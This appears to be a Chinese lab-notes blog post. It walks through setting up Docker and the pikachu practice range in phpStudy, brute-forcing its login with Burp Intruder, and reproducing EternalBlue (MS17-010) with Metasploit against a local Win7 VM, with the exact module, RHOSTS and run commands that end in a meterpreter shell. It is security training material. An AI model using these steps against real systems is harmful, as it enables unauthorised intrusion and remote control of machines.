一、docker搭建
1.创建文件夹
root@shadow1-VMware-Virtual-Platform:/home/shadow1# mkdir /etc/systemd/system/docker.service.d
2.vim编辑
root@shadow1-VMware-Virtual-Platform:/etc/systemd/system/docker.service.d# vim http-proxy.con
编辑内容为自己主机ip
3.重新加载、启动及拉取镜像
4.启动容器、查看容器
二、用小皮面板搭建pikachu靶场
1.下载小皮面板(phpstudy)
phpStudy - Windows 一键部署 PHP 开发环境 | 免费本地建站工具 · 小皮出品
2.将pikachu文件夹放入小皮面板下载根目录的WWW文件夹下
3.打开小皮面板启动套件
4.在浏览器完成站点搭建,在网址栏输入localhost
5.再在地址栏加入pichachu,完成对pichachu的访问
6.点击最上面的提示,进行安装/初始化
注意!!!
如果你遇到以下问题:
那大概率是你的MySQL数据库的版本问题 ,可以在小皮面板的软件管理中下载其他的MySQL版本进行尝试。
三、bp 使用爆破模块破解 pikachu 的登陆密码
1.打开pichachu中的表单破解
2.使用Brup进行拦截,并发送给Intruder
3.Brup拦截成功
4.给密码添加位置标识符
5.找到playload
6.点击从文件中加载
7.然后点击发起攻击,得到结果如下
四、msf复现永恒之蓝
本次实验是在Kali系统下进行,请先安装Kali系统。
1.对msf进行更新
2.进入msf模块
3.查看永恒之蓝模块
永恒之蓝的编号(名称)为:MS17-010
4.使用永恒之蓝的模块
msf6 > use exploit/windows/smb/ms17_010_eternalblue
设置模块的参数(可以只设置必须设置的参数,如:RHOSTS)
RHOSTS需要设置目标主机的ip地址(win7虚拟机上的ip)
msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 192.168.182.130
5.运行模块
直接run它,等它攻击成功
msf6 exploit(windows/smb/ms17_010_eternalblue) > run
攻击成功,进入meterpreter终端